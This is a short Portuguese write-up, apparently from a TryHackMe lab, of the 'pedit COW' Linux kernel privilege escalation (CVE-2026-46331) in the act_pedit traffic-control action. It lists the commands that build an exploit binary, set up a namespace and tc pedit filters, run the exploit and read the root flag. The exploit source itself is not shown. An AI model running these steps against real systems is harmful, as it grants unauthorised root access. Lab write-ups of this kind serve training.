
Análise e etapas de exploração da vulnerabilidade pedit COW (CVE-2026-46331)
Write-up e etapas de exploração para a vulnerabilidade pedit COW (CVE-2026-46331).
Este desafio demonstra o pedit COW, uma falha do kernel Linux na ação de edição de pacotes do subsistema de controle de tráfego (act_pedit). A vulnerabilidade permite que um usuário sem privilégios sobrescreva uma cópia em memória de um binário setuid-root, obtendo efetivamente um shell root sem nunca tocar no arquivo no disco.
O ambiente inicia como um usuário sem privilégios (karen).
id
cd ~/packet_edit_meme
make packet_edit_meme
unshare -r -n
tc qdisc del dev lo clsact
tc qdisc add dev lo clsact
tc filter add dev lo egress matchall action pedit ex munge ip ttl set 64
exit
./packet_edit_meme
# cat /root/flag.txt
THM{YOUR_FLAG_HERE}